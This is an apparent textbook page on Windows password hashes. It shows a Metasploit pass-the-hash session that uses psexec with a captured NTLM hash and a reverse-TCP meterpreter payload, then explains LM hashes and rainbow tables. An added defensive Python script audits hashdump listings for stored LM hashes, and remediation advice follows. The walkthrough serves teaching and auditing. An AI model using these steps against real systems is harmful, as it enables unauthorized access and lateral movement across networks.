84 Chapter 6
was longer than 14 characters, Windows can no longer store an LM hash, and it uses the standard aad3b435 . . . string, which represents a blank password.
Pass the Hash
In the preceding example, we ran into a slight complication: We have the administrator’s username and password hashes, but we can’t crack the password in a reasonable time frame. If we don’t know the password, how can we log into additional machines and potentially compromise more systems with this one user account?

We can use the pass-the-hash technique, which requires that we have only the password hash, not the password itself. Metasploit’s windows/smb/psexec module makes this all possible, as shown here:
msf > use windows/smb/psexec
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.33.129
LHOST => 192.168.33.129
msf exploit(psexec) > set LPORT 443
LPORT => 443
msf exploit(psexec) > set RHOST 192.168.33.130
RHOST => 192.168.33.130
. . . SNIP . . .
msf exploit(psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:b75989f65d1e04af7625ed712ac36c29
SMBPass => aad3b435b51404eeaad3b435b51404ee:b75989f65d1e04af7625ed712ac36c29
msf exploit(psexec) > exploit
[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'Administrator'...
THE PROBLEM WITH LM HASHES

Just for fun, try the following: Change your password to something complex that is 14 characters or less. Then extract the password hashes from the system with hashdump and copy the first hash value (such as the portion beginning with aad3b435
This is a rainbow table attack. A rainbow table is a precomputed table used for reversing cryptographic hash functions, usually for cracking passwords. Rainbow tables use every combination of characters including 1–7, a–z, special symbols, and spaces. When you submit your hash to an online cracker, the site’s server searches through gigabytes of rainbow tables for your specific hash.
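The two LM-hash points on this page (the top of the page: a blank LM field is the fixed aad3b435b51404eeaad3b435b51404ee string, stored when the password is longer than 14 characters; the sidebar: any LM hash that is present is trivially reversible with rainbow tables) translate directly into an audit check an administrator can run over a hashdump-style listing of their own systems. The script below is an added example, not code from the book or from Metasploit. It parses lines in the user:RID:LM:NT::: format that hashdump prints, flags every account that still has a real LM hash stored, and also flags accounts whose NT hash is the well-known hash of the empty password (31d6cfe0d16ae931b73c59d7e0c089c0, MD4 of an empty string; a known constant, not taken from this page). The sample lines are constructed for the example; only the Administrator line reuses the hash shown on this page.

```python
"""Audit a hashdump-style SAM listing for LM-hash exposure.

Added example (not from the book). Flags accounts that still carry an LM
hash (reversible with rainbow tables) and accounts with an empty password.
The sample input at the bottom is constructed for illustration.
"""
import re

# LM field Windows stores when no LM hash exists: password longer than
# 14 characters, or LM storage disabled by policy (value from the page).
BLANK_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of the empty password: MD4 of the empty UTF-16LE string
# (well-known constant, not taken from the page).
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# user:RID:LM hash:NT hash::: as printed by hashdump.
HASHDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::\s*$"
)


def parse_hashdump_line(line):
    """Return a dict for one hashdump line, or None if it does not parse."""
    match = HASHDUMP_RE.match(line.strip())
    if match is None:
        return None
    rec = match.groupdict()
    rec["rid"] = int(rec["rid"])
    rec["lm"] = rec["lm"].lower()
    rec["nt"] = rec["nt"].lower()
    return rec


def audit_account(rec):
    """List the weaknesses visible from a single account record."""
    findings = []
    if rec["lm"] != BLANK_LM:
        # A stored LM hash means the password is 14 characters or fewer
        # and the host still writes LM hashes: rainbow-table reversible.
        findings.append("LM hash stored (password <= 14 chars, LM storage enabled)")
    if rec["nt"] == EMPTY_NT:
        findings.append("empty password")
    return findings


def audit_hashdump(text):
    """Map each parsable account name to its list of findings."""
    report = {}
    for line in text.splitlines():
        rec = parse_hashdump_line(line)
        if rec is None:
            continue  # prompts, banners, blank lines
        report[rec["user"]] = audit_account(rec)
    return report


def accounts_with_lm_hash(text):
    """Names of accounts whose LM field is not the blank constant."""
    return sorted(
        user for user, findings in audit_hashdump(text).items()
        if any(f.startswith("LM hash stored") for f in findings)
    )


# Constructed sample listing. The Administrator hash is the one shown on
# this page; the other two lines are made up for the example.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b75989f65d1e04af7625ed712ac36c29:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacyuser:1001:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
[*] this line is not a hash and is skipped
"""

if __name__ == "__main__":
    for user, findings in audit_hashdump(SAMPLE).items():
        status = "; ".join(findings) if findings else "ok"
        print(f"{user:15} {status}")
    print("LM hashes present for:", accounts_with_lm_hash(SAMPLE))
```

Any account the script lists under "LM hash stored" is the one to fix first: the remediation is to disable LM hash storage on the host (the "Do not store LAN Manager hash value on next password change" security policy) and then force a password change, since the LM hash is only dropped when the password is next set.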